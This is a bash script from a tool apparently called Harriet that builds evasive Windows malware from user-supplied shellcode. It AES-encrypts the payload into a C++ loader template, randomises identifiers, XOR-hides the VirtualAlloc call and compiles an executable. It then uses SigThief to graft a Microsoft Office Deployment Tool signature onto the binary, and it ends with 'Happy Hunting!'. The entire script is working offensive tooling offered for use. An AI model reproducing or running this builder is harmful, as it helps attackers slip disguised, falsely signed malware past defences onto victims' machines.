FULLAes.sh 5.4 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139
  1. #!/bin/bash
  2. # Color variables
  3. red='\033[0;31m'
  4. green='\033[0;32m'
  5. yellow='\033[0;33m'
  6. blue='\033[0;34m'
  7. magenta='\033[0;35m'
  8. cyan='\033[0;36m'
  9. # Clear the color after that
  10. clear='\033[0m'
  11. cat << "EOF"
  12. ___ _ _ _
  13. / _ \ | | | | | |
  14. / /_\ \_ _| |_ ___ _ __ ___ __ _| |_ ___ __| |
  15. | _ | | | | __/ _ \| '_ ` _ \ / _` | __/ _ \/ _` |
  16. | | | | |_| | || (_) | | | | | | (_| | || __/ (_| |
  17. \_| |_/\__,_|\__\___/|_| |_| |_|\__,_|\__\___|\__,_|
  18. ___ _____ _____ _____ _ _
  19. / _ \ | ___/ ___| | ___| | | (_)
  20. / /_\ \| |__ \ `--. | |__ _ __ ___ _ __ _ _ _ __ | |_ _ ___ _ __
  21. | _ || __| `--. \ | __| '_ \ / __| '__| | | | '_ \| __| |/ _ \| '_ \
  22. | | | || |___/\__/ / | |__| | | | (__| | | |_| | |_) | |_| | (_) | | | |
  23. \_| |_/\____/\____/ \____/_| |_|\___|_| \__, | .__/ \__|_|\___/|_| |_|
  24. __/ | |
  25. |___/|_|
  26. EOF
  27. echo -e ${green}"Enter The Path To Your Shellcode File. ex: /home/user/Downloads/shellcode.bin"${clear}
  28. echo ""
  29. read Shellcode
  30. echo ""
  31. echo -e ${green}"Name Your Malware! ex: malware.exe"${clear}
  32. echo ""
  33. read MALWARE
  34. echo ""
  35. cp Harriet/FULLAes/xor.py Harriet/FULLAes/Resources/xor.py
  36. cp Harriet/FULLAes/template.cpp Harriet/FULLAes/Resources/template.cpp
  37. echo -e ${yellow}"+++Encrypting Payload+++" ${clear}
  38. echo ""
  39. sleep 2
  40. python Harriet/FULLAes/Resources/aesencrypt.py $Shellcode > shell.txt
  41. echo -e ${yellow}"***Encryption Completed***"${clear}
  42. echo ""
  43. cp shell.txt shell2.txt
  44. #Generate AES Key
  45. keys=$(cat "shell2.txt")
  46. cut -d 'p' -f1 shell2.txt > shell3.txt
  47. keys=$(cat shell3.txt)
  48. keysnow=${keys#*=}
  49. sed -i "s/KEYVALUE/$keysnow/g" Harriet/FULLAes/Resources/template.cpp
  50. #Generate AES Payload
  51. payload=$(cat "shell.txt")
  52. payloadnow=${payload#*;}
  53. payloadtoday=${payloadnow#*=}
  54. echo $payloadtoday > shell5.txt
  55. perl -pe 's/PAYVAL/`cat shell5.txt`/ge' -i Harriet/FULLAes/Resources/template.cpp
  56. sleep 2
  57. cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-8} | head -n 1 > shell.txt
  58. Random1=$(cat shell.txt)
  59. sed -i "s/Random1/$Random1/g" Harriet/FULLAes/Resources/template.cpp
  60. cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
  61. Random2=$(cat shell.txt)
  62. sed -i "s/Random2/$Random2/g" Harriet/FULLAes/Resources/template.cpp
  63. cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-19} | head -n 1 > shell.txt
  64. Random3=$(cat shell.txt)
  65. sed -i "s/Random3/$Random3/g" Harriet/FULLAes/Resources/template.cpp
  66. cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-16} | head -n 1 > shell.txt
  67. Random4=$(cat shell.txt)
  68. sed -i "s/Random4/$Random4/g" Harriet/FULLAes/Resources/template.cpp
  69. cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-14} | head -n 1 > shell.txt
  70. Random5=$(cat shell.txt)
  71. sed -i "s/Random5/$Random5/g" Harriet/FULLAes/Resources/template.cpp
  72. cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-5} | head -n 1 > shell.txt
  73. Random6=$(cat shell.txt)
  74. sed -i "s/Random6/$Random6/g" Harriet/FULLAes/Resources/template.cpp
  75. cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-4} | head -n 1 > shell.txt
  76. Random7=$(cat shell.txt)
  77. sed -i "s/Random7/$Random7/g" Harriet/FULLAes/Resources/template.cpp
  78. cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-2} | head -n 1 > shell.txt
  79. Random8=$(cat shell.txt)
  80. sed -i "s/Random8/$Random8/g" Harriet/FULLAes/Resources/template.cpp
  81. #VIRTUALALLOC VARIABLE NAME
  82. cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
  83. Random9=$(cat shell.txt)
  84. sed -i "s/Random9/$Random9/g" Harriet/FULLAes/Resources/template.cpp
  85. #XOR FUNCTION VARIABLE NAME
  86. cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
  87. RandomA=$(cat shell.txt)
  88. sed -i "s/RandomA/$RandomA/g" Harriet/FULLAes/Resources/template.cpp
  89. #XOR KEY VALUE
  90. cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-15} | head -n 1 > shell.txt
  91. XOR_KEY=$(cat shell.txt)
  92. sed -i "s/XOR_KEY/$XOR_KEY/g" Harriet/FULLAes/Resources/template.cpp
  93. sed -i "s/XOR_KEY/$XOR_KEY/g" Harriet/FULLAes/Resources/xor.py
  94. #XOR KEY VARIABLE
  95. cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-17} | head -n 1 > shell.txt
  96. XOR_VARIABLE=$(cat shell.txt)
  97. sed -i "s/XOR_VARIABLE/$XOR_VARIABLE/g" Harriet/FULLAes/Resources/template.cpp
  98. rm shell.txt
  99. #VIRTUALALLOC - XOR String
  100. echo VirtualAlloc > virt.txt
  101. python Harriet/FULLAes/Resources/xor.py virt.txt > virtalloc.txt
  102. virt=$(cat virtalloc.txt)
  103. virt2="${virt::-8}"
  104. sed -i "s/VIRALO/$virt2/g" Harriet/FULLAes/Resources/template.cpp
  105. rm virt*
  106. echo -e ${yellow}"+++Compiling Malware+++"${clear}
  107. x86_64-w64-mingw32-g++ -o $MALWARE Harriet/FULLAes/Resources/template.cpp -fpermissive -Wno-narrowing >/dev/null 2>&1
  108. echo ""
  109. sleep 2
  110. rm shell*
  111. echo -e ${yellow}"***Malware Compiled***"${clear}
  112. echo ""
  113. sleep 2
  114. echo -e ${yellow}"+++Adding Binary Signature+++"${clear}
  115. echo ""
  116. sleep 2
  117. python3 Harriet/Resources/SigThief/sigthief.py -i Harriet/Resources/officedeploymenttool.exe -t $MALWARE -o signed$MALWARE >/dev/null 2>&1
  118. mv signed$MALWARE $MALWARE
  119. echo -e ${yellow}"***Signature Added. Happy Hunting!**"${clear}
  120. echo ""